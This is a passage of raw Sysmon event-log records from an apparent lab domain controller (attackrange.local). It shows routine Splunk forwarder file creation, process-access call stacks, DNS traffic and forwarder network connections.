Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202118Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.520{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66540DE82C4DA05D33727CA3394BE2C1,SHA256=CF9D7C65962A95485628EB8046C1518EFBB0015C42988DE0AD26143A29547000,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202117Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.504{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E85B-6040-194E-00000000AD01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202116Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.504{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202115Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.504{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202114Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.504{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202113Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.504{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202112Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.504{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E85B-6040-194E-00000000AD01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202111Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.504{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E85B-6040-194E-00000000AD01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202110Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.505{5ABCFE62-E85B-6040-194E-00000000AD01}2424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002202109Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:59.059{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60605-false10.0.1.12-8000- 23542300x80000000000000002202108Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.285{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6355C6F9466588A910EFEAEB387934A,SHA256=8B0B5229DB6965830554C727D5D6096489C40A2EAB2FDA1ED4D031D81411AF6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202120Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:04.535{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=22343588D425A1544E0A9BB789C6B9DB,SHA256=25B4A4904E572C2F6873671180C64758378413EC09B9C7C0A68AF7E4419F8E79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202119Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:04.535{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7975BD8E1B30E75BC78C28C983E6F607,SHA256=0C4E0326D17DF70ACBBB0A021ED96208E679110F11B5B5B429E148E18F2E69D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202121Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:05.535{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46077EB1D53AB9D65688DC4E506CA2E3,SHA256=5F075AA20780E42501E2683F7AFA85B7CFB871308403B828CDA0552527B7B22C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202124Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:06.879{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202123Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:06.676{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3DE1B9B0A920439188F2CDBC5CDF6B7,SHA256=1DBEEDA2B525F5558A5C05A5A697D3103EE85BBB22B534ABBF3F7C474AC0938D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202122Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:06.551{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD182CDF1046AC32C4AC2BA60170AA2,SHA256=63FEB4A0C9C9CE1C47715C6398965CA1F9D4B3157E1ABC6F57820FBEB790E40E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202127Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:07.879{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C12D08B185C0A60200770B7E5AE3BF21,SHA256=7A6E365DB8BCAA4C2E5644B599EC1ADCF5E89039F173F5E0E6C55A35CF837CA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202126Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:07.566{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C59D36C12C3ECDF0296CC2E0CB352357,SHA256=D38BF18207DE42EC415FF579EEFFEAD5E38B8FF95E38449FAA8356A00699BDB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202125Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:03.558{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51100-true2001:dc3:0:0:0:0:0:35m.root-servers.net53domain 23542300x80000000000000002202129Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:08.566{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01A848554536E1E83F6E220179381B94,SHA256=6E8E204C6CD42A85EE400B8D24D9AFABD946A914A61879CC8277417FC7801BAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202128Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:04.700{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60606-false10.0.1.12-8089- 23542300x80000000000000002202131Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:09.566{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B283C2F387EF544484B4C400AC557C45,SHA256=C4DCA2E713FF874505A37E10451282B3AEBEFB2C1881DDCA80EEFA62A25F882A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202130Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:04.918{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60607-false10.0.1.12-8000- 23542300x80000000000000002202133Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:10.691{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76CA6A7EDE8406042B3FAC56AE844EB1,SHA256=CDF7B184E0DE46DC4C8BA8648C85628F5BAA902763147D9257FB749E3A8C3889,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202132Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:10.566{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=642CECB736F53FEA20A0EA3A48A327EE,SHA256=2369FE50F283D88A03E48AA7FFB3B5E282805315FE9CC3DF3527D6D5810ACF9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202136Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:11.769{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E39B5BCAA98749BEEE10AC695C18E91,SHA256=C465E5B9CB35FD0D661A38162315DD8891379A7F93EDADDE43E8898D06E21AA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202135Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:11.582{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AEE4504E13E322AE15F40FF62039942,SHA256=30B24B62EEBF57D70A9558274BD57C65988C609AC03BC91D7135EA0CF495F579,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202134Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:07.512{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local59115- 23542300x80000000000000002202138Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:12.598{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4343129FF3D943434EAAE0194BB69EB,SHA256=92F1DBB05734F9284929FE8322B3DBB1A06FB49E8E1AE4F179C48A29201A6870,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202137Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:08.527{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-59115- 23542300x80000000000000002202140Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:13.598{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB38BED1FF56205B331D24C7910BD533,SHA256=DD0FD77AFEE80539EF18639CCBEF73120BE308C7642E3C1BA32D97108BCAACF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202139Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:13.363{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1DE37350D16F17A3578482F64BC360C0,SHA256=AC1486CB60A514604D1777EF591FAC7A7C46DD9DD44C73F83CE79EAC388DD936,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202142Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:09.965{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60608-false10.0.1.12-8000- 23542300x80000000000000002202141Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:14.599{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B63A2AF32F91B11CE061D453281E3E8,SHA256=E27F4F872BCC39FC1AA1C4FB75BCE5D54C013B9F739B0015F74747AFBE53ED29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202143Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:15.599{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C84C1160C09A28C8D31914FAEB14497,SHA256=12302B0EC5A1C7EE09C9A292D89209C45596F9553DCF750D888FDD629366DF05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202144Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:16.612{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61483323C78B41106CF7D1E584ED7033,SHA256=371064FD58971B1492E8AECBF914F71980AC59D1D8509F1368A173B77357616F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202153Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:17.627{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ED97057B452F3351517C9F6C6B42055,SHA256=094D3D4E715BACA517BE96D9BE126F9C55E52F7668A6CC6D405FF07A8AF04EC4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202152Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:17.408{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E869-6040-1A4E-00000000AD01}5836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202151Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:17.408{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202150Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:17.408{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202149Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:17.408{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202148Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 